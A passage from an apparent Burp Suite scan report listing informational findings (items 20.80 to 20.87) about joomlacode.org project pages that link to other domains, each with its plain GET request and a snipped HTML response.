           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.80. http://joomlacode.org/gf/project/feedgator/frs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/frs/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/feedgator/frs/?action=FrsReleaseView&release_id=14013
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-frs
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/feedgator/frs/?action=FrsReleaseView&release_id=14013 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:36:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13670


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-frs" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.81. http://joomlacode.org/gf/project/feedgator/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/news/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/feedgator/news/?action=NewsThreadView&id=3279
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-news
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/feedgator/news/?action=NewsThreadView&id=3279 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.82. http://joomlacode.org/gf/project/imgttfmenu/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/imgttfmenu/news/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/imgttfmenu/news/?action=NewsThreadView&id=3281
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-news
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/imgttfmenu/news/?action=NewsThreadView&id=3281 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:28:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20337


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.83. http://joomlacode.org/gf/project/joomla/frs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/frs/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5696
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-frs
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5696 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19637


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-frs" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.84. http://joomlacode.org/gf/project/joomla/reporting/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/reporting/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/joomla/reporting/?action=Activity
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-reporting
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/joomla/reporting/?action=Activity HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:21:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-reporting" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.85. http://joomlacode.org/gf/project/joomla/scmsvn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/scmsvn/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/joomla/scmsvn/?action=browse&path=%2Fdevelopment%2F
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-scmsvn
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://svnbook.red-bean.com/en/1.2/index.html
  • http://viewvc.tigris.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/joomla/scmsvn/?action=browse&path=%2Fdevelopment%2F HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16602


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-scmsvn" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<li ><a href="http://svnbook.red-bean.com/en/1.2/index.html" target="_blank">SVN Reference</a>
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<td>Powered by <a href="http://viewvc.tigris.org/">ViewVC 1.0.0</a>
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.86. http://joomlacode.org/gf/project/joomla/tracker/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/tracker/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/joomla/tracker/?action=TrackersReport
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/es/help.php?section=project-tracker
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.rochenhost.com/

Request

GET /gf/project/joomla/tracker/?action=TrackersReport HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:15:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2048507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-tracker" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...

20.87. http://joomlacode.org/gf/project/mambot_google1/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/mambot_google1/news/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/mambot_google1/news/?action=NewsThreadView&id=3275
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-news
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/mambot_google1/news/?action=NewsThreadView&id=3275 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:43:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21277


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
